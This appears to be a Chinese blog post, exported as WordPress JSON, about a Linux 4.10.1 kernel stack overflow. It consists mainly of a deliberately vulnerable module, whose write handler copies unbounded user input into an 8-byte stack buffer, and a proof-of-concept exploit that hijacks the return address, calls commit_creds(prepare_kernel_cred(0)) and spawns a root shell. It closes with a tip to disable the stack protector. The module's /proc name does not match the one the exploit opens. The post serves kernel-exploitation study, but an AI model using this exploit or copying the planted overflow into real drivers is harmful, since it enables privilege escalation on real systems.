{"id":141,"date":"2020-10-28T17:24:44","date_gmt":"2020-10-28T09:24:44","guid":{"rendered":"http:\/\/pareto.fun\/?p=141"},"modified":"2020-10-29T20:14:26","modified_gmt":"2020-10-29T12:14:26","slug":"141","status":"publish","type":"post","link":"http:\/\/pareto.fun\/?p=141","title":{"rendered":"KernelStackOverflow"},"content":{"rendered":"\n

\u73af\u5883<\/h1>\n\n\n\n

kernel : 4.10.1<\/p>\n\n\n\n

\u6f0f\u6d1e\u4ee3\u7801<\/h1>\n\n\n\n
#include <linux\/init.h>
#include <linux\/module.h>
#include <linux\/kernel.h>
#include <linux\/proc_fs.h>
#include <linux\/cred.h>
\u200b
\u200b
\u200b
ssize_t bug1_write(struct file * file, const char __user * buff, size_t st, loff_t * loft){
    char buf[8];
    memcpy(buf,buff ,st);
    printk(\"Hello %s\\n bug1_write addr :\\t %p\",buf,bug1_write);
    return st;
}
\u200b
static struct file_operations myops = {
    .write = bug1_write
};
\u200b
static int null_dereference_init(void)
{
    printk(KERN_ALERT \"kernelstack driver init! print addr\\n\");
    proc_create(\"bug1\", 0666, 0 , &myops);
    return 0;
}
\u200b
static void null_dereference_exit(void)
{
    printk(KERN_ALERT \"kernelstack driver exit\\n\");
}
\u200b
module_init(null_dereference_init);
module_exit(null_dereference_exit);
MODULE_LICENSE(\"Dual BSD\");<\/pre>\n\n\n\n
POC:<\/p>\n\n\n\n
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys\/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
\u200b
struct trap_frame {
    void *eip;
    uint32_t cs;
    uint32_t eflags;
    void *esp;
    uint32_t ss;
}__attribute__((packed));
\u200b
struct trap_frame tf;
\u200b
void get_shell(void)
{
    execl(\"\/bin\/sh\", \"sh\", NULL);
}
\u200b
void init_tf_work(void)
{
    \/\/\u5185\u8054\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\u5168\u5c40\u53d8\u91cf
    asm(\"pushl %cs; popl tf+4;\" \/\/ set cs
        \"pushfl; popl tf+8;\" \/\/ set eflags
        \"pushl %esp; popl tf+12;\"
        \"pushl %ss; popl tf+16;\");
    tf.eip = &get_shell;
    tf.esp -= 1024;
}
#define KERNCALL __attribute__((regparm(3)))
void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xc1057120;
void *(*commit_creds)(void *) KERNCALL = (void *) 0xc1056f80;
\u200b
void payload(void)
{
    commit_creds(prepare_kernel_cred(0));
    asm(\"mov $tf, %esp;\"
        \"iret;\");
}
\u200b
int main(void)
{
    char buf[24];
    memset(buf, 'A', 24);
    *((void **)(buf+20)) = &payload; \/\/ set eip to payload
    init_tf_work();
    int fd = open(\"\/proc\/bug2\", O_WRONLY);
    \/\/ exploit
    write(fd, buf, sizeof(buf));
    return 0;
}<\/pre>\n\n\n\n
\u5982\u679cpoc\u6267\u884c\u9020\u6210Kernel panic\uff0c\u800c\u6ca1\u6709\u5c06EIP\u8986\u76d6\u4e3a0x42424242\uff0c\u53ef\u80fd\u662f\u7f16\u8bd1Kernel\u65f6\u9ed8\u8ba4\u5f00\u542f\u4e86canary\uff0c\u9700\u8981\u5173\u95edcanary\u9009\u9879\uff1a\u5173\u95edSTACK_POTECTOR\u3001menuconfig \u83dc\u5355\u4e2d\u627eSTACKPOTECTOR\u3002<\/p>\n\n\n\n